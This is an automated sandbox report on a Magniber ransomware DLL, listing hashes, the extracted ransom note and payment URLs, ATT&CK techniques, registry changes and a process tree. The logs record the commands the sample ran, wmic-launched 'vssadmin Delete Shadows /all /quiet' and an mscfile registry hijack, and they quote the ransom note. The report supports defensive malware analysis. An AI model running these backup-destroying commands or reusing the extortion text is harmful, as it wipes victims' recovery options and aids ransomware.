magniber | 06acd697bc0a41a6fa1098eba46ddd40d029a5fef3eb152fbf9d0d39e6f8673d

Analysis

max time kernel
124s
max time network
127s
platform
windows7_x64
resource
win7-20231025-en
resource tags

arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
submitted
02-12-2023 09:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06acd697bc0a41a6fa1098eba46ddd40d029a5fef3eb152fbf9d0d39e6f8673d.dll
Size

38KB
MD5

96d505aa061f15eff5b723ae3f82bc98
SHA1

fadec5f3bd444044ec269334cfb1ee9fff41da12
SHA256

06acd697bc0a41a6fa1098eba46ddd40d029a5fef3eb152fbf9d0d39e6f8673d
SHA512

925fdeb3b7cdf337ac809cd2e35b8301020dd1c6f9da25754e2a0b762c2a4a187090777c97c26cd43fd93297f62b00c15593579eadd9cb72f187dc1793cf7ed0
SSDEEP

768:biAFh5YBIKGMZmJ1/VTrzDSXl+h6AbUMP02Q3NYVdQDVMM:bT2nZoVTrzDSjVMEvWM

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://ee18d6d090a0dc1078gihmepi.7hibj3fp6jlp52q2m4lv6thx2lr34itaayiydby2axofaql54dung3ad.onion/gihmepi Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://ee18d6d090a0dc1078gihmepi.hateme.uno/gihmepi http://ee18d6d090a0dc1078gihmepi.oddson.quest/gihmepi http://ee18d6d090a0dc1078gihmepi.dearbet.sbs/gihmepi http://ee18d6d090a0dc1078gihmepi.legcore.space/gihmepi Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://ee18d6d090a0dc1078gihmepi.7hibj3fp6jlp52q2m4lv6thx2lr34itaayiydby2axofaql54dung3ad.onion/gihmepi

http://ee18d6d090a0dc1078gihmepi.hateme.uno/gihmepi

http://ee18d6d090a0dc1078gihmepi.oddson.quest/gihmepi

http://ee18d6d090a0dc1078gihmepi.dearbet.sbs/gihmepi

http://ee18d6d090a0dc1078gihmepi.legcore.space/gihmepi

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/1768-0-0x0000000001E00000-0x000000000203E000-memory.dmp	family_magniber
behavioral1/memory/1120-16-0x0000000000390000-0x0000000000395000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1572	2636	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1536	2636	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	528	2636	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2904	2636	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	2636	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2076	2636	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1704	2636	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2288	2636	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3000	2636	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	2636	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1468	2636	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2536	2636	vssadmin.exe	37

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (90) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1768 set thread context of 1120	1768	rundll32.exe	16
PID 1768 set thread context of 1228	1768	rundll32.exe	15
PID 1768 set thread context of 1268	1768	rundll32.exe	14
PID 1768 set thread context of 1160	1768	rundll32.exe	12

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 8 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
3000	vssadmin.exe
1468	vssadmin.exe
2536	vssadmin.exe
1572	vssadmin.exe
528	vssadmin.exe
2904	vssadmin.exe
2076	vssadmin.exe
1704	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CF950321-90F6-11EE-865C-E6432E1EF08D} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30fc98a40325da01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "407671891"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002e1e81ecbc95de49994f369c3e71718400000000020000000000106600000001000020000000e9eb02f42b18f268f9ceac0462ca02e14b1e4204784ad16d6792b8bc9525659e000000000e8000000002000020000000719a1c02a0dfd49e45fc0a786711a31b725a209285f6b54a0fba128446c713b320000000326d622656040d58ec75d8b5769bff8bcadcb45ea1dc8cd0af08f39e1ee502e6400000000c7057cd570e8b9c4102c27e1a6d7a87545f95b2df29c780a21c7a3c1a5564f378a57a887c9640d95493dae1a8b06066a4624d75b5da3608d371b48e7e20217f	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002e1e81ecbc95de49994f369c3e717184000000000200000000001066000000010000200000009f8378ef48a03358172751035d06316fa409140652c104727611528a6d8e8d8e000000000e800000000200002000000035927cc85046a4a9f3572c37c4145f71bc349a746386fd3d60a23fb89ff6e72790000000dc7a2b11deef7275cdf35deec63f8655e4a3b17ac6961269569297ba5ca4ee7174879619aeea19361468b852ebddb430628277134ad750bccf59f20f7c33f28bd0e7580997be034eb73471932dc08c2e751ec0834f83d8351f052c291c835fd28048e694f30b5fdf75cdfe765a63a923ba1e78d095c46cf53ad964bb8b889f82bdf02bf548c5e19a4aed3b735b30b9c04000000088a12dbf397f0c51f2100a7a9af3170e177408f5e7147852216c4d84bc9b8ae397a7a6fbce368a64cb0181cfebdd07c3cdcdcca1be0ed8834adff7498f12a887	iexplore.exe

Modifies registry class 11 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2000	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1768	rundll32.exe
1768	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1268	Explorer.EXE

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1768	rundll32.exe
1768	rundll32.exe
1768	rundll32.exe
1768	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	640	wmic.exe
Token: SeSecurityPrivilege	640	wmic.exe
Token: SeTakeOwnershipPrivilege	640	wmic.exe
Token: SeLoadDriverPrivilege	640	wmic.exe
Token: SeSystemProfilePrivilege	640	wmic.exe
Token: SeSystemtimePrivilege	640	wmic.exe
Token: SeProfSingleProcessPrivilege	640	wmic.exe
Token: SeIncBasePriorityPrivilege	640	wmic.exe
Token: SeCreatePagefilePrivilege	640	wmic.exe
Token: SeBackupPrivilege	640	wmic.exe
Token: SeRestorePrivilege	640	wmic.exe
Token: SeShutdownPrivilege	640	wmic.exe
Token: SeDebugPrivilege	640	wmic.exe
Token: SeSystemEnvironmentPrivilege	640	wmic.exe
Token: SeRemoteShutdownPrivilege	640	wmic.exe
Token: SeUndockPrivilege	640	wmic.exe
Token: SeManageVolumePrivilege	640	wmic.exe
Token: 33	640	wmic.exe
Token: 34	640	wmic.exe
Token: 35	640	wmic.exe
Token: SeIncreaseQuotaPrivilege	2484	WMIC.exe
Token: SeSecurityPrivilege	2484	WMIC.exe
Token: SeTakeOwnershipPrivilege	2484	WMIC.exe
Token: SeLoadDriverPrivilege	2484	WMIC.exe
Token: SeSystemProfilePrivilege	2484	WMIC.exe
Token: SeSystemtimePrivilege	2484	WMIC.exe
Token: SeProfSingleProcessPrivilege	2484	WMIC.exe
Token: SeIncBasePriorityPrivilege	2484	WMIC.exe
Token: SeCreatePagefilePrivilege	2484	WMIC.exe
Token: SeBackupPrivilege	2484	WMIC.exe
Token: SeRestorePrivilege	2484	WMIC.exe
Token: SeShutdownPrivilege	2484	WMIC.exe
Token: SeDebugPrivilege	2484	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2484	WMIC.exe
Token: SeRemoteShutdownPrivilege	2484	WMIC.exe
Token: SeUndockPrivilege	2484	WMIC.exe
Token: SeManageVolumePrivilege	2484	WMIC.exe
Token: 33	2484	WMIC.exe
Token: 34	2484	WMIC.exe
Token: 35	2484	WMIC.exe
Token: SeIncreaseQuotaPrivilege	640	wmic.exe
Token: SeSecurityPrivilege	640	wmic.exe
Token: SeTakeOwnershipPrivilege	640	wmic.exe
Token: SeLoadDriverPrivilege	640	wmic.exe
Token: SeSystemProfilePrivilege	640	wmic.exe
Token: SeSystemtimePrivilege	640	wmic.exe
Token: SeProfSingleProcessPrivilege	640	wmic.exe
Token: SeIncBasePriorityPrivilege	640	wmic.exe
Token: SeCreatePagefilePrivilege	640	wmic.exe
Token: SeBackupPrivilege	640	wmic.exe
Token: SeRestorePrivilege	640	wmic.exe
Token: SeShutdownPrivilege	640	wmic.exe
Token: SeDebugPrivilege	640	wmic.exe
Token: SeSystemEnvironmentPrivilege	640	wmic.exe
Token: SeRemoteShutdownPrivilege	640	wmic.exe
Token: SeUndockPrivilege	640	wmic.exe
Token: SeManageVolumePrivilege	640	wmic.exe
Token: 33	640	wmic.exe
Token: 34	640	wmic.exe
Token: 35	640	wmic.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1876	iexplore.exe
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1876	iexplore.exe
1876	iexplore.exe
436	IEXPLORE.EXE
436	IEXPLORE.EXE
436	IEXPLORE.EXE
436	IEXPLORE.EXE

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1268	Explorer.EXE
1268	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1120 wrote to memory of 2000	1120	taskhost.exe	28
PID 1120 wrote to memory of 2000	1120	taskhost.exe	28
PID 1120 wrote to memory of 2000	1120	taskhost.exe	28
PID 1120 wrote to memory of 908	1120	taskhost.exe	29
PID 1120 wrote to memory of 908	1120	taskhost.exe	29
PID 1120 wrote to memory of 908	1120	taskhost.exe	29
PID 1120 wrote to memory of 640	1120	taskhost.exe	32
PID 1120 wrote to memory of 640	1120	taskhost.exe	32
PID 1120 wrote to memory of 640	1120	taskhost.exe	32
PID 1120 wrote to memory of 944	1120	taskhost.exe	30
PID 1120 wrote to memory of 944	1120	taskhost.exe	30
PID 1120 wrote to memory of 944	1120	taskhost.exe	30
PID 944 wrote to memory of 2484	944	cmd.exe	35
PID 944 wrote to memory of 2484	944	cmd.exe	35
PID 944 wrote to memory of 2484	944	cmd.exe	35
PID 1536 wrote to memory of 2840	1536	cmd.exe	38
PID 1536 wrote to memory of 2840	1536	cmd.exe	38
PID 1536 wrote to memory of 2840	1536	cmd.exe	38
PID 2840 wrote to memory of 2588	2840	CompMgmtLauncher.exe	44
PID 2840 wrote to memory of 2588	2840	CompMgmtLauncher.exe	44
PID 2840 wrote to memory of 2588	2840	CompMgmtLauncher.exe	44
PID 1228 wrote to memory of 1096	1228	Dwm.exe	51
PID 1228 wrote to memory of 1096	1228	Dwm.exe	51
PID 1228 wrote to memory of 1096	1228	Dwm.exe	51
PID 1228 wrote to memory of 1168	1228	Dwm.exe	53
PID 1228 wrote to memory of 1168	1228	Dwm.exe	53
PID 1228 wrote to memory of 1168	1228	Dwm.exe	53
PID 1168 wrote to memory of 1456	1168	cmd.exe	55
PID 1168 wrote to memory of 1456	1168	cmd.exe	55
PID 1168 wrote to memory of 1456	1168	cmd.exe	55
PID 2204 wrote to memory of 488	2204	cmd.exe	60
PID 2204 wrote to memory of 488	2204	cmd.exe	60
PID 2204 wrote to memory of 488	2204	cmd.exe	60
PID 488 wrote to memory of 2124	488	CompMgmtLauncher.exe	61
PID 488 wrote to memory of 2124	488	CompMgmtLauncher.exe	61
PID 488 wrote to memory of 2124	488	CompMgmtLauncher.exe	61
PID 908 wrote to memory of 1876	908	cmd.exe	63
PID 908 wrote to memory of 1876	908	cmd.exe	63
PID 908 wrote to memory of 1876	908	cmd.exe	63
PID 1876 wrote to memory of 436	1876	iexplore.exe	67
PID 1876 wrote to memory of 436	1876	iexplore.exe	67
PID 1876 wrote to memory of 436	1876	iexplore.exe	67
PID 1876 wrote to memory of 436	1876	iexplore.exe	67
PID 1268 wrote to memory of 1540	1268	Explorer.EXE	71
PID 1268 wrote to memory of 1540	1268	Explorer.EXE	71
PID 1268 wrote to memory of 1540	1268	Explorer.EXE	71
PID 1268 wrote to memory of 1144	1268	Explorer.EXE	70
PID 1268 wrote to memory of 1144	1268	Explorer.EXE	70
PID 1268 wrote to memory of 1144	1268	Explorer.EXE	70
PID 1144 wrote to memory of 1280	1144	cmd.exe	72
PID 1144 wrote to memory of 1280	1144	cmd.exe	72
PID 1144 wrote to memory of 1280	1144	cmd.exe	72
PID 1768 wrote to memory of 2044	1768	rundll32.exe	76
PID 1768 wrote to memory of 2044	1768	rundll32.exe	76
PID 1768 wrote to memory of 2044	1768	rundll32.exe	76
PID 1768 wrote to memory of 2096	1768	rundll32.exe	75
PID 1768 wrote to memory of 2096	1768	rundll32.exe	75
PID 1768 wrote to memory of 2096	1768	rundll32.exe	75
PID 2096 wrote to memory of 2956	2096	cmd.exe	79
PID 2096 wrote to memory of 2956	2096	cmd.exe	79
PID 2096 wrote to memory of 2956	2096	cmd.exe	79
PID 2288 wrote to memory of 1492	2288	cmd.exe	84
PID 2288 wrote to memory of 1492	2288	cmd.exe	84
PID 2288 wrote to memory of 1492	2288	cmd.exe	84

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1160

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\06acd697bc0a41a6fa1098eba46ddd40d029a5fef3eb152fbf9d0d39e6f8673d.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2096
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:2956
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2044
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1144
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1280
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1540

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1228
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1096
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1168
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1456

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2000
- C:\Windows\system32\cmd.exe
  cmd /c "start http://ee18d6d090a0dc1078gihmepi.hateme.uno/gihmepi^&2^&50682131^&90^&401^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:908
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://ee18d6d090a0dc1078gihmepi.hateme.uno/gihmepi&2&50682131&90&401&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1876 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:436
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:944
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2484
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:640

C:\Windows\system32\CompMgmtLauncher.exe
CompMgmtLauncher.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:2840
- C:\Windows\system32\wbem\wmic.exe
  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2588

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1572

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2532

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:528

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2904

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2204
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:488
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2124

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2076

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1704

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:1492
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1648

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3000

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:1248
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:3052
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1208

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1468

